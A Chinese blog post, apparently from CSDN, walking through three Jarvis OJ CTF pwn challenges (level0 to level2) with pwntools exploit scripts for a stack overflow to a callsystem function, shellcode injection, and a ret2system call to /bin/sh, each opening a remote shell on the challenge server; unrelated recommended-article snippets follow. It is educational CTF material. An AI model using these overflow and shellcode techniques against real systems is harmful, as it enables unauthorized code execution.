Jarvis oj level系列小记

最新推荐文章于 2024-03-16 21:19:11 发布
原创 最新推荐文章于 2024-03-16 21:19:11 发布 · 319 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#pwn
本文通过三个CTF Pwn题目,详细介绍了利用栈溢出、shellcode和system函数进行攻击的方法。从level0到level2,展示了如何使用Python脚本构造payload,包括64位和32位环境下的技巧。

level0
首先我们先checksec一下level0文件,

在这里插入图片描述
可以尝试栈溢出
可以看到level0是64位文件,所以将level0拖入ida_x64,这类题简单,直接给出了system和/bin/sh

在这里插入图片描述在这里插入图片描述
再查看vulnerable_function函数

在这里插入图片描述

同时,read可以读入0x200个字符,所以可以实现覆盖callsystem的地址
代码如下

from pwn import *
p = remote("pwn2.jarvisoj.com",9881) 
d = 'a'*0x80
f = 'a'*8
sys_addr = 0x0000000000400596
payload = d+ f + p64(sys_addr)
p.send(payload)
p.interactive()

效果如下

在这里插入图片描述
level1
首先checksec level1

在这里插入图片描述
发现文件是32位的,还发现了nx保护是关闭的,将文件拖入ida32

在这里插入图片描述
发现并没有system,我们点vulnerable_function函数
在这里插入图片描述

发现了一个printf函数,综合来看可以执行shellcode
代码如下

from pwn import *
shellcode = asm(shellcraft.sh())
p = remote('pwn2.jarvisoj.com', 9877)
text = p.recvline()[14: -2]
buf_addr = int(text, 16)
payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
p.send(payload)
p.interactive()

脚本执行

在这里插入图片描述
level2
第一步先checksec level2

在这里插入图片描述
level2是32位,就拖入32位ida

在这里插入图片描述
发现有system,进入字符串发现有bin/sh

在这里插入图片描述
再查看vulnerable_function函数

在这里插入图片描述
综上条件
脚本如下

from pwn import * 
p = remote('pwn2.jarvisoj.com','9878')
elf = ELF('./level2')
sh_addr = elf.search('/bin/sh').next()
system_addr = elf.symbols['system']
exit_addr = elf.symbols['read']
payload = 'a' * (0x88 + 0x4) + p32(system_addr) + p32(exit_addr) + p32(sh_addr)
p.send(payload)
p.interactive()

效果如下

在这里插入图片描述
暂时先写到这,细节以后有时间补,小白所做,大佬绕过,新手食用。

Unity 场景资源level0 level 及sharedassets0 sharedasset1
热门推荐
kangluo1的博客
02-13 2万+
Unity出包后场景中引用的贴图 材质等,一直以来我都认为是保存在LevelI及LevelRes文件中,今天特意做了个测试,并不是这么回事。经过测试结果如下: 1.编辑器下的场景文件内容:我们以文本形式打开一个场景文件,如下: ...
XCTF:level0[WriteUP]
如有错误感谢斧正
03-16 632
PWN入门题目:XCTF攻防世界的level0
xctf攻防世界pwn level0的断点调试
你的小粉丝的博客
07-24 933
level0文件拖入Ubuntu桌面 打开终端:输入cd DESKtop/ gdb level0 开始运行 start 得到如图所示 断点调试 切换到Windows系统,用ida64打开level0 找到main函数的地址,复制 在Ubuntu终端下执行命令:b *0x+刚复制的地址 执行结果如图: 按r运行至断点处 其他命令 ...
深入理解LevelDB
varyall的专栏
05-08 2870
Compact过程:为了解决SSTable的读取速度问题。Bigtable提出了compact策略。Compact操作是将一个或多个SSTable作为输入,输出一个compact完成的SSTable。Compact操作完成这样几件事情:1.将重叠的行聚集到一张SSTable中,这样在读取一行的时候就不需要多次读取SSTable了。2. 删除过期数据(如果有设置TTL)。3. 删除标记为tombst...
攻防世界level0 + (Jarvis Oj)(Pwn) level1
qq_44832048的博客
07-24 2153
攻防世界level0文件在ida中打开, 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,双击进去查看,, 无参数传入,buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。查找字符串 这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址...
LevelDB库简介
weixin_34183910的博客
10-15 2799
LevelDB库简介     一、LevelDB入门 LevelDB是Google开源的持久化KV单机数据库,具有很高的随机写,顺序读/写性能,但是随机读的性能很一般,也就是说,LevelDB很适合应用在查询较少,而写很多的场景。LevelDB应用了LSM (Log Structured Merge) 策略,lsm_tree对索引变更进行延迟及批量处理,并通过一种类似于归并排序的方式高...
leveldb源码分析之sst文件格式
weixin_37871174的博客
03-02 4485
转载:http://luodw.cc/2015/10/21/leveldb-09/之前leveldb分析,讲解了leveldb两大组件memtable和log文件。这篇文章主要分析leveldb将内存数据写入磁盘文件,这些磁盘文件的格式,下一篇文章再分析源码。leveldb插入数据时,首先将数据插入memtable,当memtable数据量达到一定大小时,当前memtable赋值给immemtab...
Level0直接将sst文件写入到LevelN 现象 来看rocksdb对compaction的优化
天行健,地势坤
01-15 2342
通过level_compaction_dynamic_level_bytes=true 配置 来对rocksdb compaction 逻辑的优化。 现象就是L0的sst文件经过compaction直接写入到了Ln层。
JarvisOJ level4
PLpa的博客
07-08 2534
这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。 前言: DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。 这是DynELF函数使用的一个模板: def leak(address): payload=pad+p...
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 5134
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
Jarvis OJ level1
九层台
07-06 887
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1311
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
jarvisojpwnlevel系列wp
Huiuyao的博客
12-09 3006
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
jarvisoj——[XMAN]level0
王嘟嘟的博客
07-14 557
题目 Wp 拿下来之后发现是一个64位的,直接开ida main函数,现在对main函数已经很熟悉了 这里看到一个方法 这里按照规则覆盖即可。 脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...
易语言源码易语言登录163邮箱源码
最新发布
06-24
易语言源码易语言登录163邮箱源码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值